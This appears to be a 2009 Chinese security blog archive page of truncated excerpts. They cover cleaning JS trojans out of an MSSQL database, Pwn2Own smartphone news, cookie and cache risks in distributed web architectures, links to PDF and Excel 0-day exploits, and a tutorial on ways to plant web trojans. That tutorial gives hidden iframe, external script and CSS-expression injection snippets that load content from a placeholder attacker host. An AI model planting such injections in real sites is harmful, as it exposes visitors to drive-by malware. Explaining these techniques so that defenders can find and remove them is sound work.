MSSQL数据库被插入木马批量删除sql语句,一朋友服务器被批量插入了js木马,几乎每个表的文本字段都被插入了,网上找了这个sql语句,修改了下,备用。
–删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N’update ‘+QUOTENAME(o.name)
+N’ set ‘+ QUOTENAME(c.name) + N’ = replace(‘ + QUOTENAME(c.name)…
Archive for 二月, 2009
从系统表自动生成sql语句来运行得到结果
SELECT a.name AS columnname,object_name(a.id)AS tablename INTO t FROM syscolumns a,
sysobjects b,
systypes c
WHERE a.id=b.id
AND a.xtype=c.xtype
AND b.xtype=’u’
AND c.name IN(’varchar’,'nvarchar’,'char’,'nchar’,'text’,'ntext’)
AND object_name(a.id)<>’t’
go
CREATE…
TippingPoint公司透露,2009年的Pwn2Own黑客竞赛的重点将转移到智能手机,主要任务是测试跨平台移动操作系统的安全.
智能手机的安全近年来越来越受到关注,苹果的iPhone,微软的WM,RIM的BB和Google的Android,还有诺基亚的Symbian都是关注的对象,比赛分两个阶段进行,第一天面向远程突破系统,第二天突破专家预先安装好的软件.Pwn2Own对于智能手机产业来说是一个极大的考验,这是一次非常罕见的安全大检查.
本次Pwn2Own黑客大赛奖金达到10000美元,此外还有实物奖品 — 谁突破的设备谁拿走.
此外,Windows 7,Internet Explorer 8,Mozilla Firefox和Chrome浏览器的黑客比赛项目也非常受关注,将近5000美金.
6064
今天闲一点,大致说说目前流行的这种WEB系统安全架构需要注意的问题。
顺便先提一下所谓当前流行的WEB架构。在网络架构方面,目前流行的趋势和以前传统的门户网站采用七层交换,或者四层交换集中式部署做负载均衡不同,比较倾向于在物理位置上做分布式节点,通过智能DNS引导用户就近访问。这些CDN节点,有的是实际的WEB服务器,但是大多数可能只是一些Squid或者 Nginx之类的反向代理。这样做的好处第一是有更好的用户体验,第二是在拒绝服务攻击时,也有更灵活的应对方式。
鉴于系统分布式部署的趋势,因此在编码方面,也就开始流行刺提到过的Restful风格。所谓Restful风格,本质来说,就是客户端自己维持自己的状态,而且服务端信任这个客户端维持的状态。根据从客户端获取到的不同的状态,返回不同的页面。这里尽量的减少了服务端的判断等工作,让客户端对WEB系统的依赖性减轻,服务端做的仅仅是根据状态返回结果,并且在需要时为服务器设置一个新的状态,即所谓状态变迁。这点和P2P的去中心化有些类似,客户端不太在意自己连接到了哪一个服务器上面,只要自己维持着自己的状态,连接到WEB系统的任意一个服务器得到的结果都是一样的。目前流行的做法,就是不适用 session仅仅使用cookie,当然使用数据库session也是可以的。但是我觉得尽量把这些事情给客户端去做更好,减少数据库服务器的维护成本和故障风险,去中心化彻底一些。
目前这种分布式缓存节点大量使用,以及客户端自己维持状态的架构的流行,带来的两个安全风险就是敏感内容缓存的风险,以及客户端状态窃取或伪造的风险,而且前所未有的突出。
关于客户端维护的状态检验以及反窃取,关键点在于对cookie的加密算法强度以及完整性检验可靠度。在客户端状态被窃取时降低风险,我提到过cookie加入时间戳的方案,这个在刺的文章里有很详细的探讨,包后后面很多评论。
…
1,挂马的N种方法
(1) HTML挂马法。
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。
(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script>,horse里的js写法一般为 document.write(‘http:\/\/www.xxx.com\/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<inframe src=”http://www.xxx.com/horse.htm/”></iframe>’;。不过第2种写法要注意:是原来的网页种要有body标签。
(3) 在 css中挂马。
这个方法就是在css中写入:
body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML +…
Symantec is reporting that there is an exploit in the wild for an Excel 2007 and Excel 2007 SP1 zero-day remote…
下面这个是老的。
http://insecureweb.com/%20/newish-web-based-pdf-attack-in-the-wild-with-real-exploit-code/
新的pdf 0day 在这里
http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
Maybe you read Michael Howard’s twitter feed. If so, you may be wondering why you were asked to…
现在有几个Windows用户不安装adobe产品的?
两个adobe产品的最新情况:
1. Acrobat reader, 一个好消息一个坏消息
坏消息: 前几天那个0day, Secunia已经搞出来一个不需要JS的exp,
Secunia managed to create a reliable, fully working exploit which does not use…
Position: Web Application Security Engineer
As a member of the web security team the candidate will design and implement security…